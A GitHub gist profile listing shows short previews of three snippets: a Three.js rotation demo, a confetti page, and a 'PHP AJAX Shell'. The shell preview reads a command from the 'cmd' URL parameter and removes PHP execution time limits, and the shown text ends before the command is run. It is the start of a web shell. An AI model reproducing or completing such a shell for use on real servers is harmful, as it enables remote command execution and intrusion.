Skip to content

Instantly share code, notes, and snippets.

View para-dise's full-sized avatar
💭
I may be slow to respond.

paradise para-dise

💭
I may be slow to respond.
View GitHub Profile
@para-dise
para-dise / index.html
Created July 12, 2020 18:01
Object drag rotation in Three.js
<div class="caption">Drag to rotate</div>
@para-dise
para-dise / falling-confetti.markdown
Created January 24, 2020 16:17
Falling Confetti
true
@para-dise
para-dise / AjaxShell.php
Last active September 20, 2018 11:38 — forked from lav45/AjaxShell.php
PHP AJAX Shell
<script>
var scroll = setInterval(function(){ window.scrollBy(0,1000); }, 2000); // saves having to refresh page every time shell box is too long
</script>
<?php
ini_set('max_input_time', 0);
ini_set('max_execution_time', 0);
if (!empty($_GET['cmd'])) {
$in = $_GET['cmd'];
$out = "";